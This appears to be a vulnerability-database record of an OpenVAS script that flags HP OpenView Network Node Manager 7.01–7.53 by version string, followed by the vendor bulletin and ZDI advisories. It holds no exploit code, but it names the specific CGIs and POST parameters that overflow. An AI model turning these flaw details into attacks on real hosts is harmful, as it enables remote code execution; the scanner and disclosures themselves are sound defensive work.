HP OpenView Network Node Manager Multiple Vulnerabilities - May10
2010-06-01T00:00:00
ID OPENVAS:1361412562310900243 Type openvas Reporter Copyright (C) 2010 SecPod Modified 2019-03-01T00:00:00
Description
This host is running HP OpenView Network Node Manager and
is prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_hp_openview_nnm_mult_vuln_may10.nasl 13960 2019-03-01 13:18:27Z cfischer $
#
# HP OpenView Network Node Manager Multiple Vulnerabilities - May10
#
# Authors:
# Veerendra GG <veerendragg@secpod.com>
#
# Copyright:
# Copyright (c) 2010 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# CPE of the product under test; the detection logic after the description
# block passes it to get_app_port() and get_app_version().
CPE = "cpe:/a:hp:openview_network_node_manager";
# Metadata registration. When `description` is set, only the script_* calls
# below run and the script leaves through exit(0) before any detection logic.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900243");
script_version("$Revision: 13960 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $");
script_tag(name:"creation_date", value:"2010-06-01 15:40:11 +0200 (Tue, 01 Jun 2010)");
script_bugtraq_id(40065, 40067);
# CVSS v2 base 10.0: network reachable, low complexity, no authentication,
# complete impact on confidentiality, integrity and availability.
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
# NOTE(review): HP bulletin HPSBMA02527 SSRT010098 for the same patch set also
# lists CVE-2010-1555, which is not registered here. Confirm whether that
# omission is intentional.
script_cve_id("CVE-2010-1550", "CVE-2010-1551", "CVE-2010-1552",
"CVE-2010-1553", "CVE-2010-1554");
script_name("HP OpenView Network Node Manager Multiple Vulnerabilities - May10");
# ACT_GATHER_INFO: the logic after this block only compares a stored version
# string and sends no request to the affected CGIs.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2010 SecPod");
script_family("Web application abuses");
# Presumably the detection script named here sets the "HP/OVNNM/installed" key
# and the version KB entry read later; verify against that script.
script_dependencies("secpod_hp_openview_nnm_detect.nasl");
# Requires a port identified as a web service, or port 7510, to be open.
script_require_ports("Services/www", 7510);
script_mandatory_keys("HP/OVNNM/installed");
# Advisory references: the bugtraq post, ZDI-10-081 through ZDI-10-085, and the
# HP patch download location.
script_xref(name:"URL", value:"http://marc.info/?l=bugtraq&m=127360750704351&w=2");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-081/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-082/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-083/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-084/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-085/");
script_xref(name:"URL", value:"http://support.openview.hp.com/selfsolve/patches");
script_tag(name:"summary", value:"This host is running HP OpenView Network Node Manager and
is prone to multiple vulnerabilities.");
# The insight text lists four flaw locations for the five CVEs; the last item
# covers both the MaxAge and the iCount parameter of getnnmdata.exe.
script_tag(name:"insight", value:"The specific flaw exists,
- in ovet_demandpoll.exe process, which allows remote attackers to execute
arbitrary code via format string specifiers in the sel parameter.
- when _OVParseLLA function defined within ov.dll is called from netmon.exe
(Network Monitor) daemon, which directly copies the value of the 'sel' POST
variable into a fixed-length without validating the length causing stack
buffer overflow.
- within the snmpviewer.exe CGI. The doLoad function in this process calls
sprintf() with a %s format specifier without sanitizing the user supplied
data from POST variables (act and app) causing stack-based buffer overflow.
- within the getnnmdata.exe CGI. If this CGI is requested with an invalid
MaxAge parameter or invalid iCount POST parameter a sprintf() call is made
without validating the length before coping in to a fixed-length stack
buffer causing stack-based buffer overflow.");
script_tag(name:"affected", value:"HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53");
# The fix is 7.53 plus a patch, and 7.53 is itself listed as affected.
# A version comparison alone therefore cannot confirm remediation.
script_tag(name:"solution", value:"Upgrade to NNM v7.53 and apply the patch from the references.");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary code in
the context of an application.");
script_tag(name:"solution_type", value:"VendorFix");
# Declared detection quality: the result rests on a remotely obtained version
# string, so findings need confirmation of the patch level on the host.
script_tag(name:"qod_type", value:"remote_banner_unreliable");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
# Detection logic: report the host when the stored NNM version string equals
# one of the affected releases. This is a version-only comparison. As written,
# a B.07.53 host is reported whether or not the vendor patch has been applied,
# so a finding should be confirmed against the patch level on the host.

# Port on which the product identified by CPE was detected; nothing to do
# when no such port is known.
port = get_app_port( cpe:CPE );
if( ! port ) exit( 0 );

# The return value is not used; the version is read from the KB just below.
get_app_version( cpe:CPE, port:port );

# Version string stored for this port; stop quietly when it is missing.
vers = get_kb_item( "www/"+ port + "/HP/OVNNM/Ver" );
if( ! vers ) exit( 0 );

# Affected releases, tested in the same order as the original || chain.
foreach affected_version( make_list( "B.07.01", "B.07.51", "B.07.53" ) ) {
  if( version_is_equal( version:vers, test_version:affected_version ) ) {
    # No fixed version number can be named, so the report points the reader
    # to the references.
    report = report_fixed_ver( installed_version:vers, fixed_version:"See references" );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

# No affected version matched. 99 is the OpenVAS convention for
# "checked, not affected".
exit( 99 );
{"id": "OPENVAS:1361412562310900243", "type": "openvas", "bulletinFamily": "scanner", "title": "HP OpenView Network Node Manager Multiple Vulnerabilities - May10", "description": "This host is running HP OpenView Network Node Manager and\n is prone to multiple vulnerabilities.", "published": "2010-06-01T00:00:00", "modified": "2019-03-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900243", "reporter": "Copyright (C) 2010 SecPod", "references": ["http://zerodayinitiative.com/advisories/ZDI-10-085/", "http://marc.info/?l=bugtraq&m=127360750704351&w=2", "http://zerodayinitiative.com/advisories/ZDI-10-082/", "http://zerodayinitiative.com/advisories/ZDI-10-083/", "http://zerodayinitiative.com/advisories/ZDI-10-084/", "http://zerodayinitiative.com/advisories/ZDI-10-081/", "http://support.openview.hp.com/selfsolve/patches"], "cvelist": ["CVE-2010-1552", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "lastseen": "2019-05-29T18:40:04", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23817", "SECURITYVULNS:DOC:23820", "SECURITYVULNS:DOC:23821", "SECURITYVULNS:DOC:23822", "SECURITYVULNS:VULN:10827", "SECURITYVULNS:DOC:23819", "SECURITYVULNS:DOC:23818"]}, {"type": "cve", "idList": ["CVE-2010-1551", "CVE-2010-1550", "CVE-2010-1553", "CVE-2010-1554", "CVE-2010-1552"]}, {"type": "nessus", "idList": ["HPUX_PHSS_40705.NASL", "HPUX_PHSS_40708.NASL", "HPUX_PHSS_40707.NASL"]}, {"type": "saint", "idList": ["SAINT:E31B141E7568E9F6BD86756DDBEE0E76", "SAINT:4710FCDC0395F3FB13BA4B433FB43F99", "SAINT:E0B949A72CCB7BC89903D7F732FB87A1", "SAINT:5F3BAD5DD33554F68C6FA2D69E7F76D5", "SAINT:377F10DCAC2F7BEEC4A4AF2B0BFCBA64", "SAINT:CB238558CECE292042B771AEC6061FE4", "SAINT:34D6D846B7772CD0CF4771A13E75FC3F", "SAINT:909E1C259F91E79DDA03959C79D8A151", "SAINT:4C4E1B817EDCE1F9B13110CDFAC660A7"]}, {"type": "zdi", 
"idList": ["ZDI-10-081", "ZDI-10-082", "ZDI-10-085", "ZDI-10-083", "ZDI-10-084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:481659315559426EECC8DE2DE311E620", "EXPLOITPACK:11DF6F45B49D83BD88A199FB4D372A38"]}, {"type": "exploitdb", "idList": ["EDB-ID:14181", "EDB-ID:14180", "EDB-ID:17042", "EDB-ID:17039", "EDB-ID:17040"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_MAXAGE", "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_ICOUNT", "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMPVIEWER_ACTAPP"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:99673", "PACKETSTORM:99672", "PACKETSTORM:91442", "PACKETSTORM:91443", "PACKETSTORM:99674"]}, {"type": "seebug", "idList": ["SSV:69249", "SSV:69250"]}, {"type": "d2", "idList": ["D2SEC_HPNNM5", "D2SEC_HPNNM6"]}], "modified": "2019-05-29T18:40:04", "rev": 2}, "score": {"value": 10.2, "vector": "NONE", "modified": "2019-05-29T18:40:04", "rev": 2}, "vulnersScore": 10.2}, "pluginID": "1361412562310900243", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hp_openview_nnm_mult_vuln_may10.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# HP OpenView Network Node Manager Multiple Vulnerabilities - May10\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:openview_network_node_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900243\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-01 15:40:11 +0200 (Tue, 01 Jun 2010)\");\n script_bugtraq_id(40065, 40067);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\",\n \"CVE-2010-1553\", \"CVE-2010-1554\");\n script_name(\"HP OpenView Network Node Manager Multiple Vulnerabilities - May10\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_hp_openview_nnm_detect.nasl\");\n script_require_ports(\"Services/www\", 7510);\n script_mandatory_keys(\"HP/OVNNM/installed\");\n\n script_xref(name:\"URL\", value:\"http://marc.info/?l=bugtraq&m=127360750704351&w=2\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-081/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-082/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-083/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-084/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-085/\");\n script_xref(name:\"URL\", 
value:\"http://support.openview.hp.com/selfsolve/patches\");\n\n script_tag(name:\"summary\", value:\"This host is running HP OpenView Network Node Manager and\n is prone to multiple vulnerabilities.\");\n script_tag(name:\"insight\", value:\"The specific flaw exists,\n\n - in ovet_demandpoll.exe process, which allows remote attackers to execute\n arbitrary code via format string specifiers in the sel parameter.\n\n - when _OVParseLLA function defined within ov.dll is called from netmon.exe\n (Network Monitor) daemon, which directly copies the value of the 'sel' POST\n variable into a fixed-length without validating the length causing stack\n buffer overflow.\n\n - within the snmpviewer.exe CGI. The doLoad function in this process calls\n sprintf() with a %s format specifier without sanitizing the user supplied\n data from POST variables (act and app) causing stack-based buffer overflow.\n\n - within the getnnmdata.exe CGI. If this CGI is requested with an invalid\n MaxAge parameter or invalid iCount POST parameter a sprintf() call is made\n without validating the length before coping in to a fixed-length stack\n buffer causing stack-based buffer overflow.\");\n script_tag(name:\"affected\", value:\"HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53\");\n script_tag(name:\"solution\", value:\"Upgrade to NNM v7.53 and apply the patch from the references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code in\n the context of an application.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_version( cpe:CPE, port:port );\nif( ! 
vers = get_kb_item( \"www/\"+ port + \"/HP/OVNNM/Ver\" ) ) exit( 0 );\n\nif( version_is_equal( version:vers, test_version:\"B.07.01\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.51\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.53\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02153379\r\nVersion: 1\r\n\r\nHPSBMA02527 SSRT010098 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary\r\nCode\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-05-11\r\nLast Updated: 2010-05-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM).\r\nThese vulnerabilities could be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2010-1550 (SSRT090225, ZDI-CAN-563)\r\n\r\nCVE-2010-1551 (SSRT090226, ZDI-CAN-564)\r\n\r\nCVE-2010-1552 (SSRT090227, ZDI-CAN-566)\r\n\r\nCVE-2010-1553 (SSRT090228, ZDI-CAN-573)\r\n\r\nCVE-2010-1554 (SSRT090229, ZDI-CAN-574)\r\n\r\nCVE-2010-1555 (SSRT090230, ZDI-CAN-575)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and\r\nWindows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-1550 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1551 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1552 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1553 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1554 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1555 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n 
Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks an anonymous researcher working with the TippingPoint Zero Day\r\nInitiative for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.53.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOV NNM v7.53\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX (IA)\r\n PHSS_40708 or subsequent\r\n\r\nHP-UX (PA)\r\n PHSS_40707 or subsequent\r\n\r\nLinux RedHatAS2.1\r\n LXOV_00103 or subsequent\r\n\r\nLinux RedHat4AS-x86_64\r\n LXOV_00104 or subsequent\r\n\r\nSolaris\r\n PSOV_03527 or subsequent\r\n\r\nWindows\r\n NNM_01203 or subsequent\r\n\r\nOV NNM v7.51\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\nPatch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:\r\n\r\nHost\r\n Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n nnm_753\r\n Update53\r\n\r\nOV NNM v7.01 (IA)\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\n\r\nOV NNM v7.01 (PA)\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.01 (PA).\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOperating_System\r\n Patch\r\n\r\nHP-UX (PA)\r\n PHSS_40705 or subsequent\r\n\r\nSolaris\r\n PSOV_03526 or subsequent\r\n\r\nWindows\r\n NNM_01202 or subsequent\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nNNM v7.51 - Upgrade to v7.53 and apply the appropriate patches.\r\nNNM v7.01 (IA) - Upgrade to v7.53 and apply the appropriate patches.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX\r\nSecurity Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that\r\nmay apply to a specific HP-UX system. 
It can also download patches and create a depot automatically. For\r\nmore information see https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00\r\naction: install the patches listed in the Resolution\r\n\r\nFor HP-UX OV NNM 7.01 (IA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.01.00\r\naction: upgrade to v7.53 and apply the appropriate patches\r\n\r\nFor HP-UX OV NNM 7.01 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.01.00\r\naction: install the patches listed in the Resolution\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2010 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using\r\nPGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder 
Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user\r\nsituations and, consequently, HP will not be responsible for any damages resulting from user's use or\r\ndisregard of the information provided in this Bulletin. 
To the extent permitted by law, HP disclaims all\r\nwarranties, either express or implied, including the warranties of merchantability and fitness for a\r\nparticular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided "as is" without warranty of any kind. To the extent permitted\r\nby law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of\r\nsubstitute products or services; or damages for loss of data, or software restoration. The information in\r\nthis document is subject to change without notice. Hewlett-Packard Company and the names of\r\nHewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States\r\nand other countries. 
Other product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkvpV7wACgkQ4B86/C0qfVnWRwCgvRTheRID0oYhLUKvEi4svTNv\r\n5ooAn0WbhqNcoK7cD/GfriarDtWYwDbz\r\n=G+bL\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23817", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23817", "title": "[security bulletin] HPSBMA02527 SSRT010098 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "description": "Vulnerabilities in multiple CGI applications.", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:VULN:10827", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10827", "title": "HP OpenView Network Node Manage multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1554"], "description": "ZDI-10-085: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-085\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1554\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital 
Vaccine protection filter ID 9547. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the getnnmdata.exe CGI. If this CGI is\r\nrequested with an invalid iCount POST parameter a sprintf() call is made\r\nto log the error. However, no length check is performed on the variable\r\ncontents before copying in to a fixed-length stack buffer. This can be\r\nleveraged by remote attackers to execute arbitrary code under the\r\ncontext of the webserver process.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. 
Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23822", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23822", "title": "ZDI-10-085: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1553"], "description": "ZDI-10-084: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-084\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1553\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9547. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. 
Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the getnnmdata.exe CGI. If this CGI is\r\nrequested with an invalid MaxAge parameter a sprintf() call is made to\r\nlog the error. However, no length check is performed on the variable\r\ncontents before copying in to a fixed-length stack buffer. This can be\r\nleveraged by remote attackers to execute arbitrary code under the\r\ncontext of the webserver process.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
